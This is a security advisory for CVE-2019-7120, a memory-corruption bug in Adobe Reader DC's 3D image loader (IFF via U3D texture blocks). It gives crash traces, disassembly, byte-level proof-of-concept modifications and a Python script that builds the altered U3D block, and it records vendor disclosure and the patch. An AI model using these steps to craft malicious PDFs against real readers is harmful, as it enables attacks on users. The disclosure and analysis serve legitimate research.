Acrobat Reader DC 2d.x3d!_LoadILBM() Out-of-Bounds Read in TIF::Read()

CVE ID

CVE-2019-7120

Tested Versions

  • Adobe Reader DC 2019.010.20064

Product URL(s)

  • https://acrobat.adobe.com/us/en/acrobat.html
  • https://get.adobe.com/reader/

Adobe Acrobat is a family of application software and Web services developed by Adobe Inc. to view, create, manipulate, print and manage files in Portable Document Format (PDF). It supports the ECMA-363 standard (Universal 3D File Format) via 3difr.x3d, 2d.x3d and rt3d.dll, which allow 3D content embedded in PDF files to be viewed. ECMA-363 lets a Texture Resource Declaration Block reference texture images outside the U3D stream: a continuation image can be a JPEG/PNG image embedded in the PDF file, or an image of another type loaded from the local file system. These external image formats include TGA, TIFF, PIC, GIF, BMP, PCX, PPM, IFF, FLI/FLC, RGB, PSD, RLE and CEL. The 2d.x3d module is activated when the user chooses to enable 3D content display.

Vulnerabilities in this module do not affect a default installation. However, in certain industry sectors with a frequent exchange of 3D PDF files (e.g., CAD designs), 3D content may be enabled by default, leaving users exposed to this attack vector.

Vulnerability

An out-of-bounds read can be observed in the context of the sandboxed process, running as the logged-on user.

# The debugging and analysis were done on Adobe Reader DC 2019.010.20064.
# The stack trace at crash site:

(13d0.c14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=00000000 ebx=00000015 ecx=1ccecfff edx=33561140 esi=000000c0 edi=00000003
eip=6a8d4985 esp=00afab78 ebp=00afac00 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010297
2d!png_set_filter_heuristics+0x1527:
6a8d4985 8a4101          mov     al,byte ptr [ecx+1]        ds:002b:1cced000=??

0:000> kb
 # ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00afac00 6a8d5195 402c88bf 2cec8f90 28bf6fb0 2d!png_set_filter_heuristics+0x1527
01 00afac90 6a8d28d4 2c12afa8 1ce34e68 28bf6fb0 2d!png_set_filter_heuristics+0x1d37
02 00afaca4 6b47779f 00000006 2c12afa8 1ce34e68 2d!E3DLLFunc+0xa16
03 00afacc4 6b43ae03 2cec8f90 00000006 2c12afa8 rt3d!FILETYPE::Func2d+0x5e
04 00afb14c 6b439399 332415a8 00afb604 00000000 rt3d!PrepareRescale+0xac8
05 00afb184 6b46c7fd 332415a8 00afb604 00000000 rt3d!GetPicture+0x2e
06 00afb3c0 6b46d50a 332415a8 00afb604 00000000 rt3d!EndPicturesCache+0x5352
07 00afb830 6b46ca3f 332414e8 332415a8 00afbe78 rt3d!EndPicturesCache+0x605f
08 00afc084 6b46ccfa 332414e8 00000000 28bf6fb0 rt3d!EndPicturesCache+0x5594
09 00afc2e4 6b41fda1 218fecb0 28bf6fb0 00000000 rt3d!EndPicturesCache+0x584f
0a 00afc304 6b3a77ea 00000002 28bf6fb0 7ffdfbca rt3d!e3_SCENE::MovePDVToCameraNode+0xfcd
0b 00afc784 6b373ebd 00000000 1c5b8fc8 00000000 rt3d!V4CUnloadRT+0x30b97
0c 00afc79c 6cc0c267 1c5b8fc8 00000000 00afc7f0 rt3d+0x3ebd

Brief analysis:

0:000> u
2d!png_set_filter_heuristics+0x1527:
6a8d4985 8a4101          mov     al,byte ptr [ecx+1]
6a8d4988 8802            mov     byte ptr [edx],al
6a8d498a 8a4102          mov     al,byte ptr [ecx+2]
6a8d498d 884201          mov     byte ptr [edx+1],al
6a8d4990 0fb745f4        movzx   eax,word ptr [ebp-0Ch]
6a8d4994 43              inc     ebx
6a8d4995 03d7            add     edx,edi
6a8d4997 3bd8            cmp     ebx,eax

# A variant of this issue crashes at 2d!png_set_filter_heuristics+0x150a:
(258.1a08): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=00000000 ebx=00000000 ecx=30387000 edx=3315bc01 esi=00000100 edi=00000004
eip=6a844968 esp=003db2f4 ebp=003db37c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
2d!png_set_filter_heuristics+0x150a:
6a844968 8a4101          mov     al,byte ptr [ecx+1]        ds:002b:30387001=??

0:000> u
2d!png_set_filter_heuristics+0x150a:
6a844968 8a4101          mov     al,byte ptr [ecx+1]
6a84496b 8842ff          mov     byte ptr [edx-1],al
6a84496e 8a4102          mov     al,byte ptr [ecx+2]
6a844971 8802            mov     byte ptr [edx],al
6a844973 8a4103          mov     al,byte ptr [ecx+3]
6a844976 884201          mov     byte ptr [edx+1],al
6a844979 8a01            mov     al,byte ptr [ecx]
6a84497b 884202          mov     byte ptr [edx+2],al

The call stack near the crash site is resolved as:

#0 TIF::Read(void)
#1 _LoadILBM(e3_STREAM *, e3_PICTURE *, e3_CONTEXT *)
#2 IFFImport(unsigned int, e3_STREAM *, e3_PICTURE *, e3_interface *)
#3 ...

The faulting loop reads source bytes at [ecx+1] and [ecx+2] and stores them at [edx] and [edx+1], advances edx by edi on each iteration, and compares the counter in ebx against a 16-bit value loaded from [ebp-0Ch] rather than against the size of the source buffer, so the out-of-bounds source read is paired with a write into the destination picture. Adobe has patched and classified this bug as an out-of-bounds write.

Proof of Concept

To load an external image with shading_M.u3d, start from the following block of the original file (the Modifier Chain Block for the texture "lines" and the Texture Resource Declaration Block it contains):

000002f0: 28 7c 3f 00 00 00 00 00 14 ff ff ff 3c 00 00 00  (|?.........<...
00000300: 00 00 00 00 05 00 6c 69 6e 65 73 02 00 00 00 00  ......lines.....
00000310: 00 00 00 00 01 00 00 00 55 ff ff ff 1c 00 00 00  ........U.......
00000320: 00 00 00 00 05 00 6c 69 6e 65 73 00 01 00 00 00  ......lines.....
00000330: 01 00 00 0e 01 00 00 00 01 0e 00 00 52 dc 00 00  ............R...

The following modifications are made to the above block:

# Modify the containing Modifier Chain Block (0xFFFFFF14) length:
; shading_M.u3d: change the data size field from 0x3C to 0x54

# Texture Resource Declaration Block (0xFFFFFF55):
; shading_M.u3d: change the data size field from 0x1C to 0x34

# Original Texture Resource Declaration Block data in shading_M.u3d (the image loading record consumed by 2d.x3d):
; 05 00 6c 69 6e 65 73       // String: Texture Name "lines"
; 00 01 00 00                // U32: Texture Height
; 00 01 00 00                // U32: Texture Width
; 0e                         // U8: Texture Image Type: 0x0E color RGB
; 01 00 00 00                // U32: Continuation Image Count
;                            // Now the Continuation Image Format record:
; 01                         //    U8: Compression Type 0x01 JPEG-24
; 0e                         //    U8: Texture Image Channels
; 00 00                      //    U16: Continuation Image Attributes: 0x0000 default (image data embedded)
; 52 dc 00 00                //    U32: Image Data Byte Count

# Modify to the following:
; 05 00 6c 69 6e 65 73       // String: Texture Name "lines"
; 00 01 00 00                // U32: Texture Height
; 00 01 00 00                // U32: Texture Width
; 0e                         // U8: Texture Image Type: 0x0E color RGB
; 01 00 00 00                // U32: Continuation Image Count
;                            // Now the Continuation Image Format record:
; 02                         //    U8: Compression Type 0x02 PNG
; 0e                         //    U8: Texture Image Channels
; 01 00                      //    U16: Continuation Image Attributes: 0x0001 external
; 01 00 00 00                //    U32: Image URL Count 1
;                            //    String: U16 length 0x16 followed by "httpAAAAAAAsynAA12.iff" (an .iff file, handled by IFFImport)
; 16 00 68 74 74 70 41 41 41 41 41 41 41 73 79 6e 41 41 31 32 2e 69 66 66
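The following Python script is added here as a worked example; it is not part of the original advisory and not code from Adobe or from the reporter. It serializes the Modifier Chain Block and the Texture Resource Declaration Block described in the product overview above, reproduces the original bytes from the hex dump byte for byte, applies the external-URL modification from the steps above, and recomputes the two data size fields from the block headers, so the 0x34 and 0x54 values can be checked rather than hand-counted. The ORIGINAL_CHAIN bytes are transcribed from the dump (shading_M.u3d itself is not read); the field layout (12-byte block header, U16-prefixed strings, chain padding to a 32-bit boundary) follows ECMA-363. Embedding the resulting U3D stream in a PDF is outside the script.

```python
import struct

# ECMA-363 block type identifiers used on this page.
MODIFIER_CHAIN_BLOCK = 0xFFFFFF14
TEXTURE_RESOURCE_BLOCK = 0xFFFFFF55

# Continuation Image Format field values.
COMPRESSION_JPEG24 = 0x01
COMPRESSION_PNG = 0x02
IMAGE_ATTR_EMBEDDED = 0x0000   # image data follows in the file
IMAGE_ATTR_EXTERNAL = 0x0001   # image is loaded from an external URL

# Bytes 0x2F8-0x33F of shading_M.u3d, transcribed from the hex dump on the
# page (constructed here for the example; the file itself is not read).
ORIGINAL_CHAIN = bytes.fromhex(
    "14ffffff 3c000000 00000000"                      # chain header: type, data size, metadata size
    "0500 6c696e6573 02000000 00000000 00 01000000"   # name, chain type, attributes, pad, modifier count
    "55ffffff 1c000000 00000000"                      # texture block header
    "0500 6c696e6573 00010000 00010000 0e 01000000"   # name, height, width, image type, image count
    "01 0e 0000 52dc0000"                             # JPEG-24, RGB channels, embedded, byte count
)


def u3d_string(s: bytes) -> bytes:
    """U3D String: U16 byte count followed by the raw bytes."""
    return struct.pack("<H", len(s)) + s


def pad4(n: int) -> int:
    """Bytes needed to bring n up to a 32-bit boundary."""
    return (-n) % 4


def u3d_block(block_type: int, data: bytes) -> bytes:
    """Block header (type, data size, metadata size) + data + alignment padding.

    Data Size counts the data section only; metadata is empty for these blocks.
    """
    header = struct.pack("<III", block_type, len(data), 0)
    return header + data + b"\0" * pad4(len(data))


def texture_declaration(name, height, width, image_type, compression, channels,
                        attributes, payload: bytes) -> bytes:
    """Texture Resource Declaration Block with one Continuation Image.

    payload is the U32 Image Data Byte Count for an embedded image, or the
    Image URL Count plus URL strings for an external one.
    """
    data = (u3d_string(name)
            + struct.pack("<IIB", height, width, image_type)
            + struct.pack("<I", 1)                               # Continuation Image Count
            + struct.pack("<BBH", compression, channels, attributes)
            + payload)
    return u3d_block(TEXTURE_RESOURCE_BLOCK, data)


def modifier_chain(name, chain_type, attributes, modifiers) -> bytes:
    """Modifier Chain Block: name, type, attributes, padding, count, child blocks."""
    head = u3d_string(name) + struct.pack("<II", chain_type, attributes)
    head += b"\0" * pad4(len(head))                              # Modifier Chain Padding
    data = head + struct.pack("<I", len(modifiers)) + b"".join(modifiers)
    return u3d_block(MODIFIER_CHAIN_BLOCK, data)


def original_chain() -> bytes:
    """The block as it appears in shading_M.u3d: embedded JPEG-24, 0xDC52 bytes."""
    tex = texture_declaration(b"lines", 256, 256, 0x0E, COMPRESSION_JPEG24, 0x0E,
                              IMAGE_ATTR_EMBEDDED, struct.pack("<I", 0xDC52))
    return modifier_chain(b"lines", 2, 0, [tex])


def external_chain(url: bytes = b"httpAAAAAAAsynAA12.iff") -> bytes:
    """The page's modification: PNG type, external attribute, one image URL."""
    payload = struct.pack("<I", 1) + u3d_string(url)             # Image URL Count + URL
    tex = texture_declaration(b"lines", 256, 256, 0x0E, COMPRESSION_PNG, 0x0E,
                              IMAGE_ATTR_EXTERNAL, payload)
    return modifier_chain(b"lines", 2, 0, [tex])


def read_block(buf: bytes, off: int) -> tuple:
    """Return (block type, data size, data bytes) of the block at buf[off]."""
    btype, dsize, _msize = struct.unpack_from("<III", buf, off)
    return btype, dsize, buf[off + 12: off + 12 + dsize]


def data_sizes(chain: bytes) -> tuple:
    """Walk the chain and return (chain data size, texture block data size)."""
    btype, chain_size, data = read_block(chain, 0)
    if btype != MODIFIER_CHAIN_BLOCK:
        raise ValueError("not a Modifier Chain Block")
    off = 2 + struct.unpack_from("<H", data, 0)[0]   # skip the chain name string
    off += 8                                          # chain type + attributes
    off += pad4(off)                                  # Modifier Chain Padding
    off += 4                                          # modifier count
    btype, tex_size, _ = read_block(data, off)
    if btype != TEXTURE_RESOURCE_BLOCK:
        raise ValueError("first modifier is not a Texture Resource Declaration Block")
    return chain_size, tex_size


if __name__ == "__main__":
    assert original_chain() == ORIGINAL_CHAIN                          # serializer matches the dump
    print("original sizes: %#x, %#x" % data_sizes(ORIGINAL_CHAIN))     # 0x3c, 0x1c
    print("modified sizes: %#x, %#x" % data_sizes(external_chain()))   # 0x54, 0x34
    print(external_chain().hex())
```

Because the serializer reproduces the dump exactly before the modification is applied, any mistake in the assumed layout would show up there rather than in the patched output; the +0x18 growth of both size fields comes from replacing the 4-byte Image Data Byte Count with a 4-byte URL count and a 24-byte string.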

Vendor Response

The vendor has acknowledged the issue and released an update to address it.

The vendor’s advisory can be found here: APSB19-17.

Timeline

  • 2019-01-25 Vendor disclosure
  • 2019-04-09 Vendor patched

Credit

Discovered by Wei Lei
